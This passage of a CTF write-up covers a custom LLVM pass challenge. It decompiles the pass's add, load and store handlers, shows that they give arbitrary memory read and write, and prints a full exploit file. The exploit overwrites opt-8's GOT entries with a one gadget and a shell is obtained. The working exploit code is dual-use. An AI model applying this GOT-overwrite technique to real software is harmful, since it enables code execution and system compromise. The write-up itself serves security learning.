      else if ( !strcmp(s1, "store") )
        ...
      else if ( !strcmp(s1, "load") )
        ...
      else if ( !strcmp(s1, "add") )
        ...
      else if ( !strcmp(s1, "min") && llvm::CallBase::getNumOperands(v35) == 3 )
        ...
    }
    ...
One of the more important handlers is add.
llvm::CallBase::getNumOperands returns the number of operands of the instruction. For a call, the callee is itself an operand, so the value is the number of function arguments plus 1.
llvm::CallBase::getArgOperand: its second parameter selects which argument to fetch.
llvm::ConstantInt::getZExtValue (get zero-extended value) returns the constant's value zero-extended.
reg1_0 and reg2_0 are two global variables that can be thought of as two registers. When the first argument is 1, reg is set to the address of reg1_0; when it is 2, reg is set to the address of reg2_0. The value that reg points to is then increased by the second argument.
else if ( !strcmp(s1, "add") )
{
  if ( llvm::CallBase::getNumOperands(v35) == 3 )
  {
    v17 = llvm::CallBase::getArgOperand(v35, 0);
    reg = 0LL;
    v15 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v17);
    if ( v15 )
    {
      v14 = llvm::ConstantInt::getZExtValue(v15);
      if ( v14 == 1 )
        reg = reg1_0;
      if ( v14 == 2 )
        reg = reg2_0;
    }
    if ( reg )
    {
      v13 = llvm::CallBase::getArgOperand(v35, 1u);
      v12 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v13);
      if ( v12 )
        *reg += llvm::ConstantInt::getZExtValue(v12);
    }
  }
}
load takes one argument. If it is 1, the value in reg1_0 is used as an address and the value read from there is stored into reg2_0; if it is 2, the value in reg2_0 is used as an address and the value read is stored into reg1_0. The address is not bounds-checked in any way, so this is an arbitrary-address read.
else if ( !strcmp(s1, "load") )
{
  if ( llvm::CallBase::getNumOperands(v35) == 2 )
  {
    v21 = llvm::CallBase::getArgOperand(v35, 0);
    v20 = 0LL;
    v19 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v21);
    if ( v19 )
    {
      v18 = llvm::ConstantInt::getZExtValue(v19);
      if ( v18 == 1 )
        v20 = reg1_0;
      if ( v18 == 2 )
        v20 = reg2_0;
    }
    if ( v20 == reg1_0 )
      *reg2_0 = **reg1_0;
    if ( v20 == reg2_0 )
      *reg1_0 = **reg2_0;
  }
}
store takes one argument. If it is 1, the value in reg2_0 is written to the memory that the address in reg1_0 points to; if it is 2, the value in reg1_0 is written to the memory that the address in reg2_0 points to. This is clearly an arbitrary-address write.
else if ( !strcmp(s1, "store") )
{
  if ( llvm::CallBase::getNumOperands(v35) == 2 )
  {
    v25 = llvm::CallBase::getArgOperand(v35, 0);
    v24 = 0LL;
    v23 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v25);
    if ( v23 )
    {
      v22 = llvm::ConstantInt::getZExtValue(v23);
      if ( v22 == 1 )
        v24 = reg1_0;
      if ( v22 == 2 )
        v24 = reg2_0;
    }
    if ( v24 == reg1_0 )
    {
      **reg1_0 = *reg2_0;
    }
    else if ( v24 == reg2_0 )
    {
      **reg2_0 = *reg1_0;
    }
  }
}
In addition, the GOT of the supplied opt-8 is writable (Partial RELRO) and PIE is not enabled, so overwriting a GOT entry in opt with a one gadget is enough to get a shell.
pwndbg> checksec
[*] '/home/ayoung/pwn/llvm/opt-8'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
pwndbg>
exp
In more detail: first use add to put the GOT entry's address into reg1, then load(1) to load the function's real address into reg2 (mov reg2, [reg1]), then add again to turn that address into the one gadget's address, and finally store(1) to write reg2 to the GOT address that reg1 points to (mov [reg1], reg2). The write-ups online all overwrite free. I originally wanted to overwrite malloc but found it did not seem to be called afterwards, so I simply overwrite a run of consecutive GOT entries; as long as it ends with a shell, that is enough.
//clang -emit-llvm -S exp.c -o exp.ll
void store(int a);
void load(int a);
void add(int a, int b);

void o0o0o0o0(){
    add(1, 0x77e120);
    load(1);
    add(2, 0x732dc);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
}
ayoung@ubuntu:~/pwn/llvm$ ./opt-8 -load ./VMPass.so -VMPass ./exp.ll
WARNING: You're attempting to print out a bitcode file.
This is inadvisable as it may cause display problems. If
you REALLY want to taste LLVM bitcode first-hand, you
can force output with the `-f' option.

$ whoami
ayoung
$
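The add / load / store semantics and the read-modify-write chain used by the exp can be modeled in plain C. This is a hedged sketch rather than the pass's real code: reg1 and reg2 stand in for the cells behind reg1_0 and reg2_0, all function names are hypothetical, and a local variable plays the role of the GOT entry so that nothing outside the program is touched.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of the two VM registers. */
static uintptr_t reg1, reg2;

static uintptr_t *pick(int which) {
    return which == 1 ? &reg1 : which == 2 ? &reg2 : NULL;
}

/* add(n, v): reg_n += v */
void vm_add(int which, uintptr_t value) {
    uintptr_t *reg = pick(which);
    if (reg)
        *reg += value;
}

/* load(1): reg2 = [reg1]; load(2): reg1 = [reg2]; no bounds check */
void vm_load(int which) {
    if (which == 1) reg2 = *(uintptr_t *)reg1;
    else if (which == 2) reg1 = *(uintptr_t *)reg2;
}

/* store(1): [reg1] = reg2; store(2): [reg2] = reg1; no bounds check */
void vm_store(int which) {
    if (which == 1) *(uintptr_t *)reg1 = reg2;
    else if (which == 2) *(uintptr_t *)reg2 = reg1;
}

/* Replays add, load(1), add, store(1) against a local slot that stands
 * in for a GOT entry, and returns the slot's final contents. */
uintptr_t patch_slot(uintptr_t original, uintptr_t delta) {
    uintptr_t fake_got_slot = original;
    reg1 = reg2 = 0;
    vm_add(1, (uintptr_t)&fake_got_slot);  /* reg1 = address of the slot */
    assert(reg1 == (uintptr_t)&fake_got_slot);
    vm_load(1);                            /* reg2 = old slot contents   */
    vm_add(2, delta);                      /* reg2 += offset to target   */
    vm_store(1);                           /* slot = reg2                */
    return fake_got_slot;
}
```

In the real exploit the slot is a GOT entry of opt-8 and delta is the distance from the resolved function to the one gadget; here the same four steps simply turn original into original + delta.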